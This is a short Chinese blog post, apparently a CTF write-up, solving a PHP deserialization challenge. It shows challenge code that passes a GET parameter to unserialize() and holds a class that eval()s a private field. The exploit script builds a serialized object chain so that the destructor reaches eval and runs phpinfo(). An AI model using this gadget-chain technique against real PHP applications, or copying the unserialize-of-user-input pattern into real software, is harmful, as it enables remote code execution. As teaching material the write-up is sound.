当前位置:网站首页>PHP序列化:eval

PHP序列化:eval

2022-07-31 12:40:00 小龙在山东

题目

<?php
highlight_file(__FILE__);
class lemon{
    
    protected $ClassObj;
    function __construct(){
    
        $this->ClassObj = new normal();
    }
    function __destruct(){
    
        $this->ClassObj->action();
    }
}
class normal{
    
    function action(){
    
        echo "hello";
    }
}
class evil{
    
    private $data;
    function action(){
    
        eval($this->data);
    }
}
unserialize($_GET['d']);

?>

解题思路:通过传入d参数,参数是序列化后的字符串,用来调用魔术方法__destruct,然后调用evil的action,进而可以执行eval。

wp

生成序列化字符串:

<?php
class lemon{
    
	protected $ClassObj;
	function __construct(){
    
		$this->ClassObj = new evil();
	}
}
class evil{
    
	private $data = "phpinfo();";
}

$test = new lemon();

echo urlencode(serialize($test));

1

原网站

版权声明
本文为[小龙在山东]所创,转载请带上原文链接,感谢
https://lilongsy.blog.csdn.net/article/details/126052637

边栏推荐

猜你喜欢

随机推荐